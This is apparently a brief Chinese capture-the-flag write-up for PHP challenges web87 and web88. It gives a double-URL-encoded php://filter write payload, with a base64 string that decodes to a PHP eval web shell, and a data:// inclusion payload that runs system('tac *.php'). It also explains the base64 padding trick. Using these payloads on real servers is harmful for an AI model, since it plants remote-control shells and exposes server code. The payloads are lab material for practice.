web87
谈一谈php://filter的妙用
1
2
3
| 将 php://filter/write=convert.base64-decode/resource=123.php (这里因为我们需要的是写入的权限,所以是write)进行两次url编码,得到如下
%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%36%33%25%36%46%25%36%45%25%37%36%25%36%35%25%37%32%25%37%34%25%32%45%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%44%25%36%34%25%36%35%25%36%33%25%36%46%25%36%34%25%36%35%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%33%31%25%33%32%25%33%33%25%32%45%25%37%30%25%36%38%25%37%30
|
然后再content写入经过base64编码过后的一句话 (PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg==)
这里content的值前面要加两个字符,因为base64算法解码时是4个byte一组,所以给他增加2个字符 一共8个字符
然后再查看fl0g.php就行了
web88
过滤的东西很多,但data协议还可以用。
1
| ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgKi5waHAiKTs/Pg
|
base64后面是base64编码但是不能带有加号和等号,有加号的payload不能用。
web116和web117
不会做…..